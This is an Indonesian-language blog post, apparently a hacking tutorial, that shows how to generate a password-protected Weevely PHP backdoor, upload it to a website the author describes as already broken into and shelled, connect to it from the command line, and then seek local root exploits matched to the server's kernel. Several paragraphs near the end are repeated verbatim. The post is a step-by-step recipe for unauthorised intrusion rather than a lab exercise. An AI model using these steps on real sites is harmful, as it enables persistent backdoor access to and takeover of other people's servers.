Sekarang beraksi untuk membuat nya. Merapat nyook...
Alat tempurnya:
1. PC / Laptop yang terkoneksi dengan internet.
2. Website yang sudah kita bolongin dan udah ditanam shell.
3. File backdoor weevely yang nanti kita buat.
Untuk membuatnya pertama tentus aja buka console dulu. Direktori weevely terletak di /pentest/web/backdoors/weevely jadi buka terus eksekusi dah.
root@kurawa:/pentest/web/backdoors/weevely# ./weevely
SS penampakannya kaya gini
SS penampakannya kaya gini
Sekarang tinggal kita buat dah.
root@kurawa:/pentest/web/backdoors/weevely# ./weevely.py generate kevoks kurawa.php
keterangan:
1. generate - untuk membuatnya
2. kevoks - password nya, terserah ente. Kalo nggak dikasih masukin 0000
3. kurawa - nama file ayng mau kita buat
Hasilnya kaya gini
Nongol dah tuh kurawa yang tadi kita buat.
Sekarang diapain? hapus aja gan. Hahaha. Bercanda bro. Buka website yang udah kita bolongin ditanem shell. Ane kasih SS shell ane nih gan (jaringan lagi sedikit ngambek).
Terus upload kurawa yang tadi kita buat ke web target dah. Kalo udah sekarang tinggal eksekusi buat backconnectnya (masih pada dir weevely).
./weevely.py http://[ site target ]/media/kurawa.php kevoks
Yosshh.. Langsung nongol noh. Penampakan jadi nya kaya gini nih gan.
Udah tuh sekarang terserah agan mau diapain. Mau rooting? Nggak ada yang nglarang. Kalo nggak punya Local Root silahkan agan baca post ane Auto Local Root Exploit
Kalo nggak termbus berarti muka ente kurang ganteng. Hahaha.. Kalo nggak tembus ya berarti nggak ada yang cocok, cari Local Root yang lain. Cari di pakde google banyak. Sesuaikan sama kernel nya.
Sekian post kali ini. Semoga bermanfaat.
./weevely.py http://[ site target ]/media/kurawa.php kevoks
Yosshh.. Langsung nongol noh. Penampakan jadi nya kaya gini nih gan.
Kalo nggak termbus berarti muka ente kurang ganteng. Hahaha.. Kalo nggak tembus ya berarti nggak ada yang cocok, cari Local Root yang lain. Cari di pakde google banyak. Sesuaikan sama kernel nya.
Sekian post kali ini. Semoga bermanfaat.
0 comments:
Post a Comment